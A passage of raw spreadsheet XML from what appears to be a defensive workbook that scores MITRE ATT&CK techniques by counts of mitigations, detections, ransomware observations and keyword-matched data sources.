        <f t="array" ref="AH330">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC330)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI330" s="25">
        <f>IF(AH330="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ330" s="25" t="str" cm="1">
        <f t="array" ref="AJ330">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC330)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK330" s="25">
        <f>IF(AJ330="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL330" s="25" t="str" cm="1">
        <f t="array" ref="AL330">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC330)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM330" s="25">
        <f>IF(AL330="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN330" s="60">
        <v>0</v>
      </c>
      <c r="AO330" s="51">
        <v>0</v>
      </c>
      <c r="AP330" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.0400000000000003E-2</v>
      </c>
      <c r="AQ330" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.10133333333333334</v>
      </c>
      <c r="AR330" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.10133333333333334</v>
      </c>
      <c r="AS330" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT330" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU33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31" spans="1:47" ht="32.1">
      <c r="A331" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.0400000000000003E-2</v>
      </c>
      <c r="B331" s="25">
        <f>SUM(H331,M331,V331)*(1+SUM(AE331,AG331,AI331,AK331,AM331))</f>
        <v>0.30400000000000005</v>
      </c>
      <c r="C331" s="25" t="s">
        <v>1337</v>
      </c>
      <c r="D331" s="25" t="s">
        <v>160</v>
      </c>
      <c r="E331" s="25" t="s">
        <v>1338</v>
      </c>
      <c r="F331" s="51">
        <v>1</v>
      </c>
      <c r="G331" s="51">
        <v>1</v>
      </c>
      <c r="H331" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I331">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J331">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K331">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L331">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M331" s="25">
        <v>0</v>
      </c>
      <c r="N331" s="51">
        <v>1</v>
      </c>
      <c r="O331" s="51">
        <v>0</v>
      </c>
      <c r="P331" s="51">
        <v>0</v>
      </c>
      <c r="Q331" s="51">
        <v>0</v>
      </c>
      <c r="R331" s="52" t="s">
        <v>1179</v>
      </c>
      <c r="S331" s="51">
        <v>6</v>
      </c>
      <c r="T331" s="52" t="s">
        <v>1339</v>
      </c>
      <c r="U331" s="51">
        <v>7</v>
      </c>
      <c r="V331" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.12857142857142859</v>
      </c>
      <c r="W331">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>13</v>
      </c>
      <c r="X331">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.23636363636363636</v>
      </c>
      <c r="Y331">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.23636363636363636</v>
      </c>
      <c r="Z331">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA331">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB331">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC331" s="29" t="s">
        <v>1340</v>
      </c>
      <c r="AD331" s="25" t="str" cm="1">
        <f t="array" ref="AD331">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC331)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE331" s="25">
        <f>IF(AD331="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF331" s="25" t="str" cm="1">
        <f t="array" ref="AF331">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC331)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG331" s="25">
        <f>IF(AF331="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH331" s="25" t="str" cm="1">
        <f t="array" ref="AH331">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC331)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI331" s="25">
        <f>IF(AH331="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ331" s="25" t="str" cm="1">
        <f t="array" ref="AJ331">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC331)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK331" s="25">
        <f>IF(AJ331="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL331" s="25" t="str" cm="1">
        <f t="array" ref="AL331">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC331)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM331" s="25">
        <f>IF(AL331="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN331" s="52">
        <v>0</v>
      </c>
      <c r="AO331" s="51">
        <v>0</v>
      </c>
      <c r="AP331" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.0400000000000003E-2</v>
      </c>
      <c r="AQ331" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.10133333333333334</v>
      </c>
      <c r="AR331" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.10133333333333334</v>
      </c>
      <c r="AS331" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT331" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU33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32" spans="1:47" ht="48">
      <c r="A332" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.0399999999999996E-2</v>
      </c>
      <c r="B332" s="25">
        <f>SUM(H332,M332,V332)*(1+SUM(AE332,AG332,AI332,AK332,AM332))</f>
        <v>0.30399999999999999</v>
      </c>
      <c r="C332" s="25" t="s">
        <v>1341</v>
      </c>
      <c r="D332" s="25" t="s">
        <v>208</v>
      </c>
      <c r="E332" s="25" t="s">
        <v>1342</v>
      </c>
      <c r="F332" s="51">
        <v>1</v>
      </c>
      <c r="G332" s="51">
        <v>1</v>
      </c>
      <c r="H332" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I332">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J332">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K332">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L332">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M332" s="25">
        <v>0</v>
      </c>
      <c r="N332" s="51">
        <v>0</v>
      </c>
      <c r="O332" s="51">
        <v>1</v>
      </c>
      <c r="P332" s="51">
        <v>2</v>
      </c>
      <c r="Q332" s="51">
        <v>0</v>
      </c>
      <c r="R332" s="52" t="s">
        <v>1182</v>
      </c>
      <c r="S332" s="51">
        <v>6</v>
      </c>
      <c r="T332" s="52" t="s">
        <v>1343</v>
      </c>
      <c r="U332" s="51">
        <v>6</v>
      </c>
      <c r="V332" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.12857142857142856</v>
      </c>
      <c r="W332">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>12</v>
      </c>
      <c r="X332">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.21818181818181817</v>
      </c>
      <c r="Y332">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.21818181818181817</v>
      </c>
      <c r="Z332">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>3</v>
      </c>
      <c r="AA332">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.03</v>
      </c>
      <c r="AB332">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.03</v>
      </c>
      <c r="AC332" s="29" t="s">
        <v>1344</v>
      </c>
      <c r="AD332" s="25" t="str" cm="1">
        <f t="array" ref="AD332">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC332)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE332" s="25">
        <f>IF(AD332="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF332" s="25" t="str" cm="1">
        <f t="array" ref="AF332">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC332)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG332" s="25">
        <f>IF(AF332="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH332" s="25" t="str" cm="1">
        <f t="array" ref="AH332">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC332)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI332" s="25">
        <f>IF(AH332="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ332" s="25" t="str" cm="1">
        <f t="array" ref="AJ332">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC332)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK332" s="25">
        <f>IF(AJ332="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL332" s="25" t="str" cm="1">
        <f t="array" ref="AL332">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC332)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM332" s="25">
        <f>IF(AL332="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN332" s="52">
        <v>0</v>
      </c>
      <c r="AO332" s="51">
        <v>0</v>
      </c>
      <c r="AP332" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.0399999999999996E-2</v>
      </c>
      <c r="AQ332" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.10133333333333333</v>
      </c>
      <c r="AR332" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.10133333333333333</v>
      </c>
      <c r="AS332" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT332" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU33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33" spans="1:47">
      <c r="A333" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.1392857142857137E-2</v>
      </c>
      <c r="B333" s="25">
        <f>SUM(H333,M333,V333)*(1+SUM(AE333,AG333,AI333,AK333,AM333))</f>
        <v>0.21392857142857138</v>
      </c>
      <c r="C333" s="25" t="s">
        <v>1345</v>
      </c>
      <c r="D333" s="25" t="s">
        <v>1346</v>
      </c>
      <c r="E333" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F333" s="51">
        <v>1</v>
      </c>
      <c r="G333" s="51">
        <v>0</v>
      </c>
      <c r="H333" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I333">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J333">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K333">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L333">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M333" s="25">
        <v>0</v>
      </c>
      <c r="N333" s="51">
        <v>0</v>
      </c>
      <c r="O333" s="51">
        <v>2</v>
      </c>
      <c r="P333" s="51">
        <v>1</v>
      </c>
      <c r="Q333" s="51">
        <v>0</v>
      </c>
      <c r="R333" s="52" t="s">
        <v>1347</v>
      </c>
      <c r="S333" s="51">
        <v>3</v>
      </c>
      <c r="T333" s="52" t="s">
        <v>1348</v>
      </c>
      <c r="U333" s="51">
        <v>9</v>
      </c>
      <c r="V333" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.12857142857142856</v>
      </c>
      <c r="W333">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>12</v>
      </c>
      <c r="X333">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.21818181818181817</v>
      </c>
      <c r="Y333">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.21818181818181817</v>
      </c>
      <c r="Z333">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>3</v>
      </c>
      <c r="AA333">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.03</v>
      </c>
      <c r="AB333">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.03</v>
      </c>
      <c r="AC333" s="29" t="s">
        <v>1349</v>
      </c>
      <c r="AD333" s="25" t="str" cm="1">
        <f t="array" ref="AD333">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC333)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE333" s="25">
        <f>IF(AD333="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF333" s="25" t="str" cm="1">
        <f t="array" ref="AF333">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC333)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG333" s="25">
        <f>IF(AF333="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH333" s="25" t="str" cm="1">
        <f t="array" ref="AH333">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC333)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI333" s="25">
        <f>IF(AH333="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ333" s="25" t="str" cm="1">
        <f t="array" ref="AJ333">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC333)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AK333" s="25">
        <f>IF(AJ333="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AL333" s="25" t="str" cm="1">
        <f t="array" ref="AL333">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC333)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM333" s="25">
        <f>IF(AL333="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN333" s="60">
        <v>0</v>
      </c>
      <c r="AO333" s="51">
        <v>0</v>
      </c>
      <c r="AP333" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.1392857142857137E-2</v>
      </c>
      <c r="AQ333" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>7.1309523809523795E-2</v>
      </c>
      <c r="AR333" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>7.1309523809523795E-2</v>
      </c>
      <c r="AS333" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT333" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU33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34" spans="1:47">
      <c r="A334" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.1392857142857137E-2</v>
      </c>
      <c r="B334" s="25">
        <f>SUM(H334,M334,V334)*(1+SUM(AE334,AG334,AI334,AK334,AM334))</f>
        <v>0.21392857142857138</v>
      </c>
      <c r="C334" s="25" t="s">
        <v>1350</v>
      </c>
      <c r="D334" s="25" t="s">
        <v>1346</v>
      </c>
      <c r="E334" s="25" t="s">
        <v>1351</v>
      </c>
      <c r="F334" s="51">
        <v>1</v>
      </c>
      <c r="G334" s="51">
        <v>0</v>
      </c>
      <c r="H334" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I334">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J334">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K334">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L334">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M334" s="25">
        <v>0</v>
      </c>
      <c r="N334" s="51">
        <v>0</v>
      </c>
      <c r="O334" s="51">
        <v>3</v>
      </c>
      <c r="P334" s="51">
        <v>0</v>
      </c>
      <c r="Q334" s="51">
        <v>0</v>
      </c>
      <c r="R334" s="52" t="s">
        <v>1347</v>
      </c>
      <c r="S334" s="51">
        <v>3</v>
      </c>
      <c r="T334" s="52" t="s">
        <v>1348</v>
      </c>
      <c r="U334" s="51">
        <v>9</v>
      </c>
      <c r="V334" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.12857142857142856</v>
      </c>
      <c r="W334">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>12</v>
      </c>
      <c r="X334">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.21818181818181817</v>
      </c>
      <c r="Y334">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.21818181818181817</v>
      </c>
      <c r="Z334">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>3</v>
      </c>
      <c r="AA334">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.03</v>
      </c>
      <c r="AB334">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.03</v>
      </c>
      <c r="AC334" s="29" t="s">
        <v>1352</v>
      </c>
      <c r="AD334" s="25" t="str" cm="1">
        <f t="array" ref="AD334">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC334)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE334" s="25">
        <f>IF(AD334="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF334" s="25" t="str" cm="1">
        <f t="array" ref="AF334">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC334)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG334" s="25">
        <f>IF(AF334="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH334" s="25" t="str" cm="1">
        <f t="array" ref="AH334">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC334)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI334" s="25">
        <f>IF(AH334="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ334" s="25" t="str" cm="1">
        <f t="array" ref="AJ334">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC334)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AK334" s="25">
        <f>IF(AJ334="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AL334" s="25" t="str" cm="1">
        <f t="array" ref="AL334">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC334)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM334" s="25">
        <f>IF(AL334="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN334" s="60">
        <v>0</v>
      </c>
      <c r="AO334" s="51">
        <v>0</v>
      </c>
      <c r="AP334" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.1392857142857137E-2</v>
      </c>
      <c r="AQ334" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>7.1309523809523795E-2</v>
      </c>
      <c r="AR334" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>7.1309523809523795E-2</v>
      </c>
      <c r="AS334" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT334" s="25">
